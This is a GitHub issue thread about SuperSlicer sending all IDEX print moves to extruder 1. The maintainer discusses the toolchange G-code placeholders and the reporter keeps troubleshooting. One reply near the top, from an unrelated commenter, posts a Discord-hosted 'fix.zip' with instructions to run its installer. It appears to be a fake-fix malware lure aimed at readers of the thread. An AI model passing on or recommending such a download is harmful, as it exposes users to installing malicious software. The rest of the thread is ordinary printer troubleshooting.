supermerill/SuperSlicer #4412: only slicing with extruder 1

cptnmidnight, 2024-09-03:
### What happened?

Trying to get an IDEX setup going, the linux version from 2.5.59.9 through 2.5.59.13 will not use any settings for extruder 2. everything sliced is going to extruder 1 only.
[image]

### Project file & How to reproduce

[Sindoh 3DWOX1 Filament Spool Spacer v6 - BOTTOM.zip](https://github.com/user-attachments/files/16844352/Sindoh.3DWOX1.Filament.Spool.Spacer.v6.-.BOTTOM.zip)

### Version

2.5.59.9+

### Operating system

Linux Mint 21

### Printer model

Sindoh 3DWOX x2

zawa999, 2024-09-03:
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

supermerill, 2024-09-04:
it's just that the gcode viewer can't understand if your toolchange custom gcode change the tool or not.
You can add a `T{next_extruder}` in it if it doesn't confuse your printer (or just to check the viewer).
Also, you use the "parallel printing steps", It seems that this feature broke the tool change, have to fix it.

cptnmidnight, 2024-09-05:
I have this for my tool change

`M104 {next_extruder} S{first_layer_temperature}		;Heat up the 1th nozzle - print temperature
M104{previous_extruder} S100
G0 F2400 Z0.200
{next_extruder}
G1 F1800 E0.00000
M107 {previous_extruder}
M109 {next_extruder} S{first_layer_temperature}`

I thought the middle line {next_extruder} should be putting T0 or T1 in the code

cptnmidnight, 2024-09-05:
And this is the output T1 only shows up in the header and footer. No tool changes are getting into the actual gcode.
[Sindoh 3DWOX1 Filament Spool Spacer v6.gcode.zip](https://github.com/user-attachments/files/16899811/Sindoh.3DWOX1.Filament.Spool.Spacer.v6.gcode.zip)

cptnmidnight, 2024-09-05:
sorry, just caught your detail of "T" in there. I will try this now.

cptnmidnight, 2024-09-05:
The reason I left out the T is because the AMS uses an M-code that has L{next_extruder} and it was crashing the firmware with M532LT1 making me think that the place holder was including the T.
Tried T{next_extruder} still not working

added comment ;Change Tool and can only find the comment in the footer of the gcode

closed 2024-09-06 by cptnmidnight